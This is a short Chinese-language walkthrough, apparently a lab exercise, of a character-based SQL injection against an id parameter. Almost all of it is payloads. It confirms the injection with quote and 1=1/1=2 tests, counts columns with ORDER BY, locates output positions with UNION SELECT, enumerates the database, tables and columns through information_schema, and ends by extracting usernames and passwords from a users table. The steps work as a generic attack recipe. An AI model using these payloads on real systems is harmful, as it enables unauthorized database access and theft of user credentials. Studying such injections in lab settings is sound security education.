首先,id=1 and 1=1和id=1 and 1=2测试是否为数字型注入。经尝试,未出现报错,所以不是数字型注入
之后尝试id=1‘ and 1=1 --+和id=1‘ and 1=2 --+出现错误,判断为字符型注入
使用order by查询列数 id=1‘ order by 4 --+
试到 4 报错 说明列数是3列
3.union联合查询,测试回显位 id=-1‘ union select 1,2,3 --+
4.爆库 id=-1‘ union select 1,database(),3 --+
爆表 id=-1‘ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
查询user列名 id=-1‘ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘),3 --+
第六步可以看到username和password,查询一下这两列的数据
id=-1‘ union select 1,(select group_concat(username) from users),(select group_concat(password) from users) --+
原文:https://www.cnblogs.com/p201921410026/p/14626592.html